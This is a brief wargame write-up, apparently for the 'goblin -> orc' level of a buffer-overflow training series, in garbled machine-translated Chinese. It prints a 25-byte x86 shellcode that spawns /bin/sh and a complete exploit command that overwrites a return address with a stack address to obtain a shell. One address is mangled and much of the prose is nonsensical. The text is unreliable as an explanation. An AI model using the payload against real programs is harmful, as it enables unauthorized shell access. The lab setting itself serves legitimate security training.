goblin -> orc



这次不能使用环境变数
而且RET的最后不是\xbf的话,程序就结束啦.
那么,buffer里加入了Shelcode,寻找buffer开始的Address,把它写在RET上.
再次控制苏斯科德,做跳舞吧.

[esp-80]看到附近的地方吧

0 xbffcb 0最后加入\xbf因此,buffer开始的Address是0 xbffffc 90
试着攻击
下面是25个摩托车
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
谢尔科德25摩托+RET开始之前的19摩托是没有意义的文字+4摩托的buffer Address
攻击科曼多就像这样
./orc `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*19+"\x90\xfc\xff\xbf"'`

シェル获得.